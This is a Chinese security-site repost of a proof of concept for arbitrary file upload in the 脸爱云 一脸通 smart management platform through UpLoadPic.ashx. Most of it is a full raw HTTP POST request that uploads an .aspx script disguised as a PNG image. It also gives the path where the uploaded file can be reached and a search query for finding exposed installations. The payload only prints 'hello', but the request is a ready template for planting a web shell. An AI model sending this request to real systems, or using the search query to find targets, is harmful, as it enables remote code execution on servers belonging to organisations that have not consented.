脸爱云 一脸通智慧管理平台UpLoadPic.ashx任意文件上传

admin 2024年6月3日19:43:26评论46 views字数 854阅读2分50秒阅读模式

漏洞影响范围

脸爱云 一脸通智慧管理平台UpLoadPic.ashx任意文件上传

漏洞复现

漏洞检测poc

POST/UpLoadPic.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13uX-Requested-With: XMLHttpRequestContent-Length: 404Connection: close
------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="action"
post------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="myPhoto"; filename="1.aspx"Content-Type: image/png
<% response.write("hello") %>------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="oldName"
------WebKitFormBoundarywt7cEu1eBdibB13u--

出现如下数据代表漏洞存在

脸爱云 一脸通智慧管理平台UpLoadPic.ashx任意文件上传

上传文件地址url+/image/xxxx.aspx

搜索语法

title=="欢迎使用脸爱云 一脸通智慧管理平台"

原文始发于微信公众号(小白菜安全):脸爱云 一脸通智慧管理平台UpLoadPic.ashx任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月3日19:43:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   脸爱云 一脸通智慧管理平台UpLoadPic.ashx任意文件上传http://cn-sec.com/archives/2805227.html

发表评论

匿名网友 填写信息